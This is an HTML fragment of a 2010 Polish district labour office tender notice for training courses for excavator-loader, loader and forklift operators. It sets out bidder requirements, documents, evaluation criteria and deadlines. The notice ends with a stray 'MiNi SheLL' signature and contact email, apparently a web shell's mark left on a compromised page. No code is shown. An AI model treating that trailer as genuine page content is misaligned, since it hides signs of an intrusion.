a)w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy   - w tym okresie, zrealizował co najmniej dwa szkolenia grupowe ( dla minimum 10 osób) o tożsamej co przedmiot zamówienia tematyce, z podaniem odbiorcy, kierunku szkolenia, wartości, daty i miejsca wykonania (według wzoru stanowiącego załącznik nr 4 do SIWZ) i przedłoży dokumenty  np. referencje potwierdzające, że usługi te zostały wykonane należycie, podpisane przez osoby upoważnione do reprezentowania wystawiającego dokument.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym  jeżeli:
a)Przedłoży wykaz niezbędnego do realizacji zamówienia sprzętu, w tym maszyn do robót ziemnych lub wózków jezdniowych wykorzystywanych do realizacji przedmiotu zamówienia wraz z informacją o podstawie dysponowania tymi zasobami (według wzoru stanowiącego załącznik nr 7 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli:
a)przedstawi wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Kadra dydaktyczna realizująca szkolenie powinna  posiadać doświadczenie w realizacji co najmniej trzech szkoleń o podobnym zakresie tematycznym w stosunku do przedmiotu zamówienia, zrealizowanych w przeciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności szkoleniowej danej osoby jest krótszy - w tym okresie (według wzoru stanowiącego załącznik nr 5 do SIWZ).    
b)złoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia (według wzoru stanowiącego załącznik nr 6 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełni warunek  sytuacji  ekonomicznej   i finansowej, jeżeli złoży:
a)informację z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w której wykonawca posiada rachunek, potwierdzającej posiadanie minimum w PLN podane w tabeli poniżej, lub zdolności kredytowej wykonawcy  ( wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert) 

Nazwa szkolenia	Wymagana minimalna wartość w PLN
Operator koparko - ładowarek kl. III - Zadanie 1 - 5.000,00
Operator ładowarek jednonaczyniowych kl. III - Zadanie 2   - 5.000,00
Kierowca wózków jezdniowych napędem silnikowym - Zadanie 3 - 	2.000,00</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)zaświadczenia o wpisie  do rejestru instytucji szkoleniowych wydanego przez wojewódzki urząd pracy właściwy ze względu na adres siedziby instytucji szkoleniowej /art. 20 ustawy  o promocji zatrudnienia i instytucjach rynku pracy/ wraz z oświadczeniem o aktualizacji wpisu na 2010 rok Zadanie nr 1, 2, 3 oraz:
b)dokumentu wydanego przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie potwierdzający spełnienie wymagań określonych w § 25  Rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych /Dz. U. z 2001r., Nr 118 poz. 1263/ w przypadku Zadania nr 1 i 2 
c)Zaświadczenie wydane przez Ośrodek Doskonalenia Kadr w Mysłowicach o zatwierdzeniu programu nauczania - Zadanie nr 3.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - posiadanie przez Wykonawcę certyfikatów, licencji, akredytacji tożsamych z kierunkiem szkolenia - 20</li>
<li>3 - ilość przeprowadzonych szkoleń o tematyce zgodnej z przedmiotem zamówienia w ciagu ostatnich 3 lat - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę  zawartej umowy w stosunku do treści  oferty, na podstawie której dokonano wyboru Wykonawcy w następujących okolicznościach:
a)Zmiana wskazanego do zajęć praktycznych pojazdu, sprzętu informatycznego, innych pomocy dydaktycznych. Zmieniony pojazd, sprzęt informatyczny, inne pomocy dydaktyczne mają posiadać parametry tożsame lub lepsze od przyjętych w ofercie. Zmiana następuje za zgodą Zamawiającego i jest możliwa tylko w okolicznościach powstałych, na które nie miał wpływu Wykonawca.
b)Zmiana wskazanego w ofercie wykładowcy tylko na wykładowcę o kwalifikacjach i doświadczeniu tożsamym lub lepszym. Zmiana następuje za zgodą Zamawiającego i jest możliwa tylko w okolicznościach powstałych, na które nie miał wpływu Wykonawca
c)Zmian lokalu wskazanego w ofercie do zajęć szkoleniowych tylko na lokal w tej samej miejscowości o standardach tożsamych lub lepszych od przyjętych w ofercie. Zmiana następuje za zgodą Zamawiającego i jest możliwa tylko w okolicznościach powstałych, na które nie miał wpływu Wykonawca
d)Gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia. 
e)Gdy nastąpi zmiana danych Zamawiającego lub Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.puptarnobrzeg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Tarnobrzegu, ul. 1 Maja 4, 39 - 400 Tarnobrzeg - pokój 305.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2010 godzina 12:00, miejsce: Powiatowy Urząd Pracy w Tarnobrzegu, ul. 1 Maja 4, 39 - 400 Tarnobrzeg, pokój 310 ( sekretariat Urzędu).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie w ramach projektu Więcej szans w powiecie tarnobrzeskim, Program Operacyjny Kapitał Ludzki Poddziałanie 6.1.3.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com